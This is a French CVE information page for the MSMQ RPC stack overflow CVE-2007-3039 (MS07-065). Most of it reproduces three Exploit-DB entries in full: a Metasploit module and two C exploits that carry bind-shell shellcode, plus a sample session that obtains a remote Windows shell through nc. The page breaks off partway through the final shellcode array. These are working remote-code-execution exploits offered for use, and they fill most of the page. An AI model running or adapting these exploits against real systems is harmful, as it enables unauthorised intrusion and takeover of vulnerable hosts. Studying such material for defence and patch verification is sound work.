Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9 | AV:N/AC:L/Au:S/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16750
Date de publication : 2010-07-24 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: ms07_065_msmq.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Message Queueing Service DNS Name Path Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the RPC interface
to the Microsoft Message Queueing service. This exploit requires
the target system to have been configured with a DNS name and
for that name to be supplied in the 'DNAME' option. This name does
not need to be served by a valid DNS server, only configured on
the target machine.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
[ 'CVE', '2007-3039'],
[ 'OSVDB', '39123'],
[ 'MSB', 'MS07-065'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\xff",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Windows 2000 Server English',
{
'Platform' => 'win',
'Ret' => 0x75022ac4 # ws2help - pop/pop/ret
},
],
],
'DisclosureDate' => 'Dec 11 2007',
'DefaultTarget' => 0))
# Change the default port values to point at MSMQ
register_options(
[
Opt::RPORT(2103),
OptString.new('DNAME', [ true, "The DNS hostname of the target" ]),
], self.class)
end
def autofilter
# Common vulnerability scanning tools report port 445/139
# due to how they test for the vulnerability. Remap this
# back to 2103 for automated exploitation
rport = datastore['RPORT'].to_i
if ( rport == 445 or rport == 139 )
datastore['RPORT'] = 2103
end
# The fqdn is required to exploit this bug
if (not datastore['DNAME'])
# XXX automatically determine the hostname
return false
end
true
end
def exploit
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
dname = datastore['DNAME']
boom = rand_text_alphanumeric(4096)
hname,domain = dname.split(".")
if(not domain)
print_status("The DNAME parameter specified is not valid.")
print_status("This option must be the fully-qualified domain name of the target (as it has been configured).")
return
end
off = 310 - (hname.length * 2)
seh = generate_seh_payload(target.ret)
boom[off, seh.length] = seh
buff = Rex::Text.to_unicode("#{dname}\\")
buff << boom
buff << "\x00\x00"
# Data alignment
while(buff.length % 4 != 0)
buff << "\x00"
end
stubdata =
NDR.long(1) + # [in] long arg_1,
NDR.UnicodeConformantVaryingStringPreBuilt(buff) + # [in][string] wchar_t * arg_2,
NDR.long(0) * 5 # ... fields we can ignore
print_status('Sending exploit...')
begin
response = dcerpc.call(6, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
case dcerpc.last_response.stub_data
when "\x14\x00\x0e\xc0"
print_error("Error: The wrong value has been supplied for the DNAME parameter")
print_error("This value must be the fully-qualified domain name of the target")
print_error("Many systems have no FQDN configured and cannot be exploited")
else
print_status("An unknown response was received from the server:")
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
end
end
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status("No response from the DCERPC service (this is usually a good thing).")
end
handler
disconnect
end
end
Exploit Database EDB-ID : 4745
Date de publication : 2007-12-17 23h00 +00:00
Auteur : axis
EDB Vérifié : Yes
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
you should know the dnsname of target to trigger this vuln
the service runs on port 2103/2105/2107
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
D:\soft\develop\MyProjects\temp\Debug>
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版æƒæ‰€æœ‰ 1985-2000 Microsoft Corp.
C:\WINNT\system32>exit
exit
sent 5, rcvd 109: NOTSOCK
D:\>
*/
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
// RPC Request Opnum: 0x06
char request_1[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00, // target's dns name (unicode)
0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
char request_2[] = {
0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
void usage(char *argv) {
printf(" Usage: %s -h 127.0.0.1 (Universal exploit)\n",argv);
printf(" %s -h host [-p port]\n",argv);
printf(" Targets:\n");
exit(1);
}
/************* TCP connect *************************/
void Disconnect(SOCKET s);
// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
/****************************************************/
int main(int argc, char * argv[]){
unsigned char * target = NULL;
int port = 2103;
int i;
int ret;
char buffer[6000] = {0};
SOCKET s;
WSADATA WSAData;
printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf("--------------------------------------------------------------------------\n\n");
if (argc==1) usage(argv[0]); //Handle parameters
for(i=1;i<argc;i++) {
if ( (argv[i][0]=='-') ) {
switch (argv[i][1]) {
case 'h':
target=(unsigned char *)argv[i+1];
break;
case 'p':
if (strcmp(argv[i+1],"2103")==0) {
printf("[+] Attacking default port 2103\n");
} else {
port=atoi(argv[i+1]);
}
break;
default:
printf("[-] Invalid argument: %s\n",argv[i]);
usage(argv[0]);
break;
}
i++;
} else usage(argv[0]);
}
/********************** attack payload ***************************/
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
fprintf(stderr, "[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
//Sleep(1200);
s = Make_Connection((char *)target, port, 10);
if(s<0)
{
fprintf(stderr, "[-] connect err.\n");
exit(1);
}
//Send our evil Payload
printf("[*]Sending our Payload, Good Luck! ^_^\n");
printf("[*]Sending RPC Bind String!\n");
send(s, bind_str, sizeof(bind_str), 0);
Sleep(1000);
printf("[*]Sending RPC Request Now!\n");
memset(buffer, '\x41', sizeof(buffer)); // fil the buffer to trigger seh
send(s, request_1, sizeof(request_1), 0);
send(s, buffer, 5104, 0); // fil the buffer to trigger seh
send(s, request_2, sizeof(request_2), 0);
Sleep(100);
memset(buffer, 0, sizeof(buffer));
ret = recv(s, buffer, sizeof(buffer)-1, 0);
//printf("recv: %s\n", buffer);
Disconnect(s);
return 0;
}
// milw0rm.com [2007-12-18]
Exploit Database EDB-ID : 4934
Date de publication : 2008-01-17 23h00 +00:00
Auteur : Marcin Kozlowski
EDB Vérifié : Yes
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
Mod of axis's code.
CHANGELOG
- added dnsname as a parameter, before it was hardcoded in the
request data. (Marcin Kozlowski)
Provided for legal security research and testing purposes ONLY
Go through the code :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#include <io.h>
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
};
char *request_1;
// RPC Request Opnum: 0x06
char request_1a[] = {
0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00
};
char *request_1b;
char request_1c[] = {
0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0, // \xeb\x06\x42\x42 jmpcode
0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, // overwrite seh ; call ebx
0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, // bindshell on port 1154, metasploit shellcode
0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
